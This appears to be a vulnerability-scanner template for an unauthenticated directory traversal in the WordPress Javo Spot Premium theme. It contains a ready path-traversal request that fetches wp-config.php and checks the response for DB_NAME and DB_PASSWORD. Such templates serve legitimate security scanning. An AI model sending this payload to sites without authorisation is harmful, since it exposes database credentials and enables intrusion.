id: wp-spot-premium-lfi

info:
  name: WordPress Javo Spot Premium Theme - Unauthenticated Directory Traversal
  author: dhiyaneshDk
  severity: high
  description: WordPress Javo Spot Premium Theme `wp-config` was discovered via local file inclusion. This file is remotely accessible and its content available for reading.
  reference:
    - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
    - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
  metadata:
    max-request: 1
  tags: wordpress,backup,wpscan

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100874560c9cb4fc49764c0a25869b2e76a00313f549e2f8eed50ddf6314bc77b9b02210091b73a611ad57208cf01d6191a7ddaa119354f1d5f2799e189d367765c745ec1:922c64590222798bb761d5b6d8e72950
